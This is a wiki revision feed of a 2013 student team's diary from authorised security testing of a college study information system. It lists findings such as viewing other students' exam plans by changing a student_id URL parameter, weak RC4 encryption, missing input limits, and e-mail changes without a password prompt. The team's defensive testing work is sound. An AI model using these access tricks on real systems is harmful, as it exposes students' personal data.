* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
* One can see other student&#039;s exam plan just by chaning student_id value in the URL (you don&#039;t need to be logged in). You cannot see his/her name directly, but according to security holes now: See the schedule, just change ID - you get the name. Or if you are logged in, then you can go to &amp;quot;My data&amp;quot; and just change ID from the URL again.&lt;br /&gt;
&#039;&#039;For example: https://itcollege.dev.ois.ee/en/schedule/agenda?student_id=2322&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Saturday - 30.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Tallinn TV Tower&lt;br /&gt;
* Visitinig The Seaplane Harbour&lt;br /&gt;
&lt;br /&gt;
===Sunday - 31.03.13===&lt;br /&gt;
&#039;&#039;&#039;Free day&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
===Monday - 01.04.13===&lt;br /&gt;
&#039;&#039;&#039;NB! April fools&#039; day!&#039;&#039;&#039; Beware!&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* We analyzed student information fields in &amp;quot;My data&amp;quot; section&lt;br /&gt;
* We test different sections and tried to change user IDs - luckily these are safe now.&lt;br /&gt;
* Tried to use HTTP for different areas in SIS. Luckily, everything is forced to HTTPS.&lt;br /&gt;
* Study materials testing. If study materials are available to everyone (public), then it is possible to download them from HTTP and/or HTTPS!&lt;br /&gt;
* Tried reflected XSS, most SIS areas escape &amp;quot;bad characters&amp;quot; out from input boxes.&lt;br /&gt;
* As the SIS allows academicians (lecturers) to change their picture, we tried to insert some malicious code into picture. Scenario was that when someone opens the picture, some bad things will happen. This did not work in SIS. Students are not allowed to change their picture due to security reasons &#039;&#039;(for example: other person taking exams claiming he/she is someone he/she is not)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still no new declaration etc opened for us. Maybe tomorrow?&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We strongly hope that there will be new declaration period, survey, scolarship application and VÕTA opened for us for tomorrow morning, because we could test them as well and we don&#039;t have much time left.&lt;br /&gt;
* Go deeper with different attacks and methods.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat&#039;s of the day:&#039;&#039;&#039;&lt;br /&gt;
* SIS (Study Information System) is vulnerable to BEAST attack, because it uses RC4 encryption algorithm in SSL. We as a test-team are not capable to perform this kind of attack, thus we cannot test how far can we go, but this is a threat to whole system. BEAST attack can sniff authorized user&#039;s cookies and then grant access to attacker.&lt;br /&gt;
* There&#039;s no character limit for input fields (search, names). This can lead to DOS-attack because attacker can send multiple requests with long URLs and then server freezes.&lt;br /&gt;
* Calendar: there&#039;s no limit or check if user have just typed numbers. Error is rendered back to user, but it is escaped.&lt;br /&gt;
* There are some developer&#039;s notes left in different SIS parts (not only in developer environment).&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 02.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Visiting Skype office.&lt;br /&gt;
* Learning the principles of good presentation to put into practice tomorrow and on Thursday.&lt;br /&gt;
* SIS is using a field called &amp;quot;security_key_sis_global&amp;quot;. This form value does not change and is based on user data. We have found out that this does not change even on change of password, so that means, this has to be calculated from person&#039;s name and/or username and/or personal ID code and/or user_id value. We have assumption that this is a SHA1 hash, as it is 40 characters long. Maybe salted, maybe not? Anyway, this could be a threat to SIS in long term perspective.&lt;br /&gt;
* Studied the OWASP ASVS (Application Security Verification Standard) with SIS in mind. Marked the requirements we can not check for (because we do not have the source code etc), the requirements we believe are met and those that need further testing.&lt;br /&gt;
*Got the chance to insert a new VÕTA (APEL) request that also allows for uploading files. This is interesting because it might be possible to upload a file containing malicious code.&lt;br /&gt;
*The SIS does not ask for password when changing the personal e-mail address. This is a risk, because this is the mail address SIS sends a password reset link to if the user clicks on &amp;quot;Forgot my password&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Really would have liked to have more time to test.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Prepare and rehearse the presentation&lt;br /&gt;
* Look further into the e-mail modification issue.&lt;br /&gt;
* Finalise ASVS review&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 03.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Studied and analysed ASVS. Went through requirements and aspects about web application security, analysed what applies to SIS and what not.&lt;br /&gt;
* We learned and practiced public presentation. Discussed structure and divided roles. Rehearsed presentation to &amp;quot;audience&amp;quot;.&lt;br /&gt;
* SIS testing (security token), javascript upload, tried to find XSS vulnerabilities in APEL (VÕTA) application and file upload areas etc.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Lack of time. Doing presentation and rehersal took so much time which could be used for testing SIS. Also, testing SIS took so much time, which again could be have been used for rehearsal.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* We want to review and rehearse our final presentation.&lt;br /&gt;
* Update our documentation in Wiki.&lt;br /&gt;
* Upload and link presentations to persons and fill gaps in documentation.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 04.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Dress rehearsal. Updated presentation according to feedback and capabilities.&lt;br /&gt;
* Updated documentation to Wiki and uploaded missing presentations.&lt;br /&gt;
* Personal input section filling in Wiki.&lt;br /&gt;
* Went bowling. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Sometimes one minute feels like it is not a minute. :)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Final documentation (link to Google docs).&lt;br /&gt;
* IP feedback&lt;br /&gt;
* Summarisation&lt;br /&gt;
&lt;br /&gt;
===Friday - 05.04.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Saturday - 06.04.13===&lt;br /&gt;
&#039;&#039;&#039;Departure! Bye bye!&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Materials (slides etc)==&lt;br /&gt;
* &#039;&#039;&#039;Slides about OWASP (Open Web Application Security Project) TOP 10 what we performed to eachother&#039;&#039;&#039;&lt;br /&gt;
** TOP 10 list [[Media:OWASP_Top_10_-_2013_-_RC1.pdf‎]]&lt;br /&gt;
** A1 Injection [[Media:2013_security_a1.pdf]] (Made by: Sandra)&lt;br /&gt;
** A2 Broken Authentication and Session Management [[Media:2013_security_a2.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A3 Cross-Site Scripting (XSS) [[Media:2013_security_a3.pdf]] (Made by: Kęstutis)&lt;br /&gt;
** A4 Insecure Direct Object References [[Media:2013_security_a4.pdf]] (Made by: Markus)&lt;br /&gt;
** A5 Security Misconfiguration [[Media:2013_security_a5.pdf]] (Made by: Tomas)&lt;br /&gt;
** A6 Sensitive Data Exposure [[Media:2013_security_a6.pdf]] (Made by: Mika)&lt;br /&gt;
** A7 Missing Function Level Access Control [[Media:2013_security_a7.pdf]] (Made by: Sten)&lt;br /&gt;
** A8 Cross-Site Request Forgery (CSRF) - was covered in A1&lt;br /&gt;
** A9 Using Known Vulnerable Components [[Media:2013_security_a9.pdf]] (Made by: Jurij)&lt;br /&gt;
** A10 Unvalidated Redirects and Forwards [[Media:2013_security_a10.pdf]] (Made by: Sten)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Day summarisation:&#039;&#039;&#039;&lt;br /&gt;
** Slides presented on the 28th of March day summarization. [[Media:2013 security presentation 28 03.pdf]]&lt;br /&gt;
** Slides presented on the 01st of April day summarization. [[Media:2013_security_presentation_01_04.pdf]]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Security teamwork (whiteboard):&#039;&#039;&#039;&lt;br /&gt;
** Whiteboard 27.03 [[Media:Security team 2013-03-27.jpg]]&lt;br /&gt;
** Whiteboard 28.03 [[Media:security_2013_picture_2803.JPG]]&lt;br /&gt;
** Whiteboard 29.03 [[Media:security_2013_picture_2903.JPG]]&lt;br /&gt;
** Whiteboard 01.04 [[Media:security_2013_picture1.JPG]]&lt;br /&gt;
** Whiteboard 02.04 [[Media:security_2013_picture_0204.JPG]]&lt;br /&gt;
** Whiteboard 03.04 [[Media:2013_security_presentation_structure.jpg]] (Discussion about final presentation)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Virtual Machines (VM VirtualBox .ova files):&lt;br /&gt;
** [http://elab.itcollege.ee:8000/security_team.ova Virtual Machine with Apache, MySQL, DVWA]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/BT5R2.ova Virtual Machine with Backtrack]&lt;br /&gt;
** [http://elab.itcollege.ee:8000/kali-64bit.ova Virtual Machine with Kali Linux]&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;Final presentation of the project to the clients (4 April 2013)&#039;&#039;&#039;&lt;br /&gt;
** [[Media:2013_security_final_presentation.pdf|Presentation slides]] &#039;&#039;(Made by whole team, structure by Sandra and Jurij)&#039;&#039;&lt;br /&gt;
** [http://echo360.e-uni.ee/ess/echo/presentation/d465007c-1582-4e58-ae0f-c7a2aa9af988 Video from echo360] &#039;&#039;(Team Security starts from 18:30)&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
==Results==&lt;br /&gt;
Summary of what we did and solution what we developed&lt;br /&gt;
&lt;br /&gt;
===Personal input===&lt;br /&gt;
====Sten Aus====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I was selected as a group leader (project manager) on the first day (25 March). We decided also that this is a democracy not a tyranny. :)&lt;br /&gt;
** Helped others to use different kind of tools (Apache, Linux, DVWA, Wordpress etc, as I have dealt with them before (subjects in college with Margus, pre-school experience).&lt;br /&gt;
** Presentations to each other about OWASP TOP 10 ([[Media:2013_security_a7.pdf|A7 - Missing Function Level Access Control]] and [[Media:2013_security_a10.pdf|A10 - Unvalidated Redirects and Forwards]]).&lt;br /&gt;
** Demos about SIS vulnerabilities in different presentations (to group members, other participants and audience).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** How to do documentation? I have documented my work before as well, but in such a big group as we had, it was first time experience for me.&lt;br /&gt;
** I learned how big value &amp;quot;same day feedback and summarisation&amp;quot; has.&lt;br /&gt;
** What security threats are out there and how to protect yourself (and your systems) against them. I have already taken different security measures into account in many web applications what I am using (or administering).&lt;br /&gt;
&lt;br /&gt;
====Matis Palm====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Helped teaching Apache &amp;amp; Linux &amp;amp; DVWA to other participants (due to having some experience already from before).&lt;br /&gt;
** Helping with sumorobot programming (Being from the robotics club).&lt;br /&gt;
** I helped to push the team in some direction at start, because no-one had previous experience and I was here last year on the Intensive Programme with the previous Security team.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; What I learned:&#039;&#039;&#039;&lt;br /&gt;
** Learned alot about how to use and search information for security testing (XSS, CSRF and so on).&lt;br /&gt;
** I learned about ASVS and OWASP and a few tools used for testing (e.g. TamperData, InjectMe XSS and CSRF and so on).&lt;br /&gt;
&lt;br /&gt;
====Sandra Suviste====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Researched and presented vulnerability No 1 from the OWASP Top 10 list - Injection ([[Media:2013_security_a1.pdf|A1 - Injections]]).&lt;br /&gt;
** Practised attacks on the DVWA.&lt;br /&gt;
** Went through the OWASP ASVS document for possible shortcomings of the SIS.&lt;br /&gt;
** Tested the SIS for vulnerabilities, mostly SQL and XSS injections - both in web forms and in the URL.&lt;br /&gt;
** Documented my own and others&#039; work.&lt;br /&gt;
** Together with Jurij we were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]]). &lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** A lot about web application vulnerabilities - from my own research &amp;amp; practice and from others&#039; presentations and teachers&#039; lectures.&lt;br /&gt;
** Became more experienced in working in a multinational group with English as the working language.&lt;br /&gt;
** I learned how to document my work in order to keep track of the work of the team.&lt;br /&gt;
** I also learned what are the issues connected to the preparing of and giving a presentation with several (&amp;gt;3) presenters.&lt;br /&gt;
&lt;br /&gt;
====Markus Rintamäki====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a4.pdf|A4 - Insecure Direct Object References]]).&lt;br /&gt;
** Different attacks on SIS, changing user ids, SQL injection and XSS.&lt;br /&gt;
** Tried to upload a picture (for a lecturer) infected with malicious .php code.&lt;br /&gt;
** I also used a tool in Backtrack to decrypt the token that we found. This was also unsuccessful.&lt;br /&gt;
** We made the presentation structure together.&lt;br /&gt;
** Googeled a lot :)&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** My knowledge in hacking a real system before this course was close to a zero. I had to learn the basic attack methods and so I did.&lt;br /&gt;
** Basic attack methods in DVWA: SQL injection, XSS and CSRF. &lt;br /&gt;
** What is SIS and how does it works?&lt;br /&gt;
** I also learned to program sumorobots, more about Linux and Wireshark.&lt;br /&gt;
** And also of course I learned to speak english more fluently. :)&lt;br /&gt;
&lt;br /&gt;
====Tomas Lepistö====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** Tried to find out possible security holes from OIS site.&lt;br /&gt;
** Tested different attacking methods with DVWA&lt;br /&gt;
** SQL-injection tests into various places on OIS site.&lt;br /&gt;
** Tested some XSS methods&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a5.pdf|A5 - Misconfigured Configuration]]).&lt;br /&gt;
** Prepared our presentation with other group members&lt;br /&gt;
** Spoke in daily summary&lt;br /&gt;
** Studied a lot of information to know what is hacking about?&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What i learned:&#039;&#039;&#039;&lt;br /&gt;
** I learned how to use SQL-injection, XSS, Brute force, CSRF&lt;br /&gt;
** I learned also how to use Kali,Backtrack,Temper data, DVWA&lt;br /&gt;
** Working in international group&lt;br /&gt;
** How important documentation is&lt;br /&gt;
** Found out how important it is to make web-application secure&lt;br /&gt;
&lt;br /&gt;
====Mika Salmela====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** I studied hacking methods&lt;br /&gt;
** Tried some hacking methods with DVWA&lt;br /&gt;
** Iscanned website, try to find if there is some security risks&lt;br /&gt;
** Tried some SQL and XSS injections&lt;br /&gt;
** OWASP TOP 10 presentations to each other [[Media:2013_security_a6.pdf|(A6 - Sensitive Data Exposure]]).&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What I learned:&#039;&#039;&#039;&lt;br /&gt;
** More than basics of how to hack?&lt;br /&gt;
** The most common hacking methods and how to use them.&lt;br /&gt;
** How to do SQL and XSS injections&lt;br /&gt;
** Basics of hacking tools&lt;br /&gt;
** How to find security risks&lt;br /&gt;
** How to work in international team.&lt;br /&gt;
** Learned much about what these are: DVWA, OWASP and ASVS.&lt;br /&gt;
&lt;br /&gt;
====Kęstutis Tautvydas====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentations to each other ([[Media:2013_security_a2.pdf|A2 - Broken Authentication and Session Management]] and [[Media:2013_security_a3.pdf|A3 - Cross-Site Scripting (XSS)]]).&lt;br /&gt;
** Searched for security holes in OIS student information site.&lt;br /&gt;
** Used DVWA tool to test sql injections and xss scripting.&lt;br /&gt;
** Tried some sql injections and xss scripting on OIS page&lt;br /&gt;
** Made presentations about broken authentication and session management and cross-site scripting and introduced them to my team mates&lt;br /&gt;
** Prepared some slides for the main presentation&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** Theory about OWASP TOP 10 threats&lt;br /&gt;
** How to do sql injections&lt;br /&gt;
** How to use Firefox tamperdata tool&lt;br /&gt;
** How to do cross-site scripting&lt;br /&gt;
** Completely understood what is use case and how to draw them&lt;br /&gt;
** How to monitor activities with Wireshark&lt;br /&gt;
** How to do a scan of web site vulnerability using Acunetix Web Vulnerability Scanner 8&lt;br /&gt;
&lt;br /&gt;
====Jurij Lukjančikov====&lt;br /&gt;
* &#039;&#039;&#039;What I did:&#039;&#039;&#039;&lt;br /&gt;
** OWASP TOP 10 presentation to each other ([[Media:2013_security_a9.pdf|A9 - Using Known Vulnerable Components]])&lt;br /&gt;
**  I and Sandra were responsible for the final presentation structure ([[Media:2013_security_final_presentation.pdf|Final presentation slides]])&lt;br /&gt;
** XSS and injection attacks to SIS&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;What have I learned:&#039;&#039;&#039;&lt;br /&gt;
** I have learned about security breaches on the web.&lt;br /&gt;
** I have tried different parts of web for vulnerabilities and injection.&lt;br /&gt;
** Together with team learned how to make injection and XSS attacks using Linux (Linux was unfamiliar for me before that).&lt;br /&gt;
&lt;br /&gt;
===Final documentation===&lt;br /&gt;
====Analysis====&lt;br /&gt;
&lt;br /&gt;
====Solution====&lt;br /&gt;
&lt;br /&gt;
==IP Feed-back==&lt;br /&gt;
===Feedback from Sten Aus===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Matis Palm===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Sandra Suviste===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Markus Rintamäki===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Tomas Lepistö===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Mika Salmela===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Kęstutis Tautvydas===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Feedback from Jurij Lukjančikov===&lt;/div&gt;</summary>
		<author><name>Saus</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62379</id>
		<title>Security</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Security&amp;diff=62379"/>
		<updated>2013-04-05T06:55:14Z</updated>

		<summary type="html">&lt;p&gt;Saus: /* Sten Aus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Team page for [[Deploying IT Infrastructure Solutions]].&lt;br /&gt;
&lt;br /&gt;
==Team Members==&lt;br /&gt;
*Sten Aus, Estonian Information Technology College&lt;br /&gt;
*Matis Palm, Estonian Information Technology College&lt;br /&gt;
*Sandra Suviste, Estonian Information Technology College&lt;br /&gt;
*Markus Rintamäki, Vaasa University of Applied Sciences&lt;br /&gt;
*Tomas Lepistö, Vaasa University of Applied Sciences&lt;br /&gt;
*Mika Salmela, Vaasa University of Applied Sciences&lt;br /&gt;
*Kęstutis Tautvydas, Vilnius University of Applied Sciences&lt;br /&gt;
*Jurij Lukjančikov, Vilnius University of Applied Sciences&lt;br /&gt;
&lt;br /&gt;
==Goal==&lt;br /&gt;
*OWASP top 10&lt;br /&gt;
*HACK DVWA&lt;br /&gt;
*BackTrack, SamuraiCD (Last year experience)&lt;br /&gt;
*Scanning and testing tools  - Qualys SSL Labs&lt;br /&gt;
*Acunetix Web Vulnerability Scanner v.8&lt;br /&gt;
*SubGraph Vega&lt;br /&gt;
*BEAST attack&lt;br /&gt;
*RC4&lt;br /&gt;
&lt;br /&gt;
==Activity==&lt;br /&gt;
===Monday - 25.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Lectures&lt;br /&gt;
* Sumorobot programming&lt;br /&gt;
* Dinner @ St Patricks&lt;br /&gt;
&lt;br /&gt;
===Tuesday - 26.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Documentation!&lt;br /&gt;
A1 Injection - &amp;lt;b&amp;gt; Sandra &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A2 Broken Authentication and Session Management (was formerly A3) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A3 Cross-Site Scripting (XSS) (was formerly A2) - &amp;lt;b&amp;gt; Kestutis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A4 Insecure Direct Object References - &amp;lt;b&amp;gt; Markus &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A5 Security Misconfiguration (was formerly A6)- &amp;lt;b&amp;gt; Tomas &amp;lt;/b&amp;gt; &lt;br /&gt;
&lt;br /&gt;
A6 Sensitive Data Exposure (merged from former A7 Insecure Cryptographic Storage and former A9 Insufficient Transport Layer Protection) - &amp;lt;b&amp;gt; Mika &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A7 Missing Function Level Access Control (renamed/broadened from former A8 Failure to Restrict URL Access) - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A8 Cross-Site Request Forgery (CSRF) (was formerly A5) - &amp;lt;b&amp;gt; Matis &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A9 Using Known Vulnerable Components (new but was part of former A6 – Security Misconfiguration) - &amp;lt;b&amp;gt; Jurij &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A10 Unvalidated Redirects and Forwards - &amp;lt;b&amp;gt; Sten &amp;lt;/b&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* Still need to get everyone a VM with DVWA running&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Copy Paste documentation tasks to Wiki :)&lt;br /&gt;
* Divide OWASP tasks&lt;br /&gt;
&lt;br /&gt;
===Wednesday - 27.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Meeting with clients. It was very open-minded meeting. We got to know more about requirements.&lt;br /&gt;
* Analysing the user needs. We discussed face to face with our client and mentor (Margus Ernits) what needs to be done in order to perform security testing. Also, we found some tools from the Internet, which we can use for testing purposes.&lt;br /&gt;
* We divided roles and shared our areas of competences. Also, we agreed that one should not be doing always the same thing, so we can share our work with eachother.&lt;br /&gt;
* Estonian ICT Presentation and Wireshark practice. Wireshark was more-less known for everyone in our team. Despite that fact, we all found something enjoyable and new from Antti&#039;s presentation and Wireshark.&lt;br /&gt;
* Estonian members made Study Information System presentation to Finnish and Lithuanians. We talked about some potential vulnerabilities (such as VÕTA declaration, file upload, sending messages, voting system)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* As none of us have done security testing before, we have a lot to learn before we can actually do something. But I think with such a team as we are, it&#039;s nothing.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Estonian members are going to study last year&#039;s report and going to make a short overview to other members about it.&lt;br /&gt;
* We are going to study OWASP Top 10 vulnerabilities and everyone of us is going to make a short presentation to others about what they have learned.&lt;br /&gt;
* We are going to ask in demo (development) environment if they can open a new survey for us, new declaration period; Also we need teacher and demo accounts, in order to test teacher&#039;s side as well, because teachers have a little more access than students (grades, information about student etc).&lt;br /&gt;
* In demo environment we are going to test new functions (what haven&#039;t been included in main environment, yet) - as there&#039;s some new functionality.&lt;br /&gt;
&lt;br /&gt;
===Thursday - 28.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* OWASP TOP 10 presentations: Everybody presented on their subjects + discussion ([[#Materials_.28slides_etc.29|slides]])&lt;br /&gt;
* Discussed the schedule and to-do list for next days&lt;br /&gt;
* Discussed some potential vulnerabilities of SIS&lt;br /&gt;
* Made shared Googledoc to document the testing and to exchange information. Also we made Skype group in order to share files effectively and fast.&lt;br /&gt;
* Prepared software for testing (Backtrack, Kali)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* There is a lot of information, we need to focus on something and just start. There is no such thing as start-line (&amp;quot;Start here and go this way&amp;quot;), we will just need to start and see what we will find. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Find attack examples for the vulnerabilities&lt;br /&gt;
* Try them out on DVWA&lt;br /&gt;
* Get familiar with Tamper Data, Kali and Backtrack&lt;br /&gt;
* Familiarise ourselves with XSS, Injection, CSRF before testing SIS&lt;br /&gt;
* See how to get authentication info from POST and GET&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threat of a day&#039;&#039;&#039;&lt;br /&gt;
* There are three environments of SIS. Live, demo and developer. We found out that developer environment is accesible with our live users and passwords. What&#039;s more -&amp;gt; developer environment has LIVE data!!! Like! Does that ring any bell to you? NEVER, we mean like NEVER use live data (data, grades, schedule, students, personal ID-s etc) in demo/developer environment!&lt;br /&gt;
&lt;br /&gt;
===Friday - 29.03.13===&lt;br /&gt;
&#039;&#039;&#039;Things what we did that day:&#039;&#039;&#039;&lt;br /&gt;
* Learned how to perform attacks. We learned different attack methods and tried them out.&lt;br /&gt;
* Learned how to use different automated tools. Automated tools are not very efficient to SIS, but still - there might pop up something interesting from the results. Results are saved for later analysis.&lt;br /&gt;
* Talked about last year&#039;s experience. Tried if most of the security holes are patched or not.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Problems what we faced:&#039;&#039;&#039;&lt;br /&gt;
* We need student access to developer environment&lt;br /&gt;
* We need new survey and declaration period opened (we asked Margus, he promised to give our request to someone who can make it)&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Things what we plan to do:&#039;&#039;&#039;&lt;br /&gt;
* Analysis of the results needs to be done&lt;br /&gt;
* Learn a little bit more about attacks&lt;br /&gt;
* Create some attacks&lt;br /&gt;
* Start to test simpler attacks to SIS&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Security threats of the day:&#039;&#039;&#039;&lt;br /&gt;
